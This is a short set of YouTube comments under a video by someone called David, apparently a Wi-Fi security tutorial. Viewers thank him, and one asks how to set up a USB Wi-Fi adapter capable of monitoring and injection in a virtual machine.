    Love your videos! Thank you 😊

  • @somchaiveeragul5743
    @somchaiveeragul5743 10 місяців тому

    Thank you very much for the knowledge you have received. Really great as it is very detailed explanation with examples.

  • @OPatron24
    @OPatron24 Рік тому

    Loved the video, thank you David!

  • @microsoftsarker
    @microsoftsarker 6 місяців тому

    Thanks man!! It was helpful 😃Thanks a lot

  • @loczster
    @loczster Рік тому

    Hey David great video, overall great channel. I have a question about the VM network.
    My computer has a built-in Wi-Fi that does not have monitoring and injection capability so I pick up a Wi-Fi adapter, a Linksys wusb6300. Do I have to disable the onboard Wi-Fi and only work out of the Linksys in order for this to work? Thanks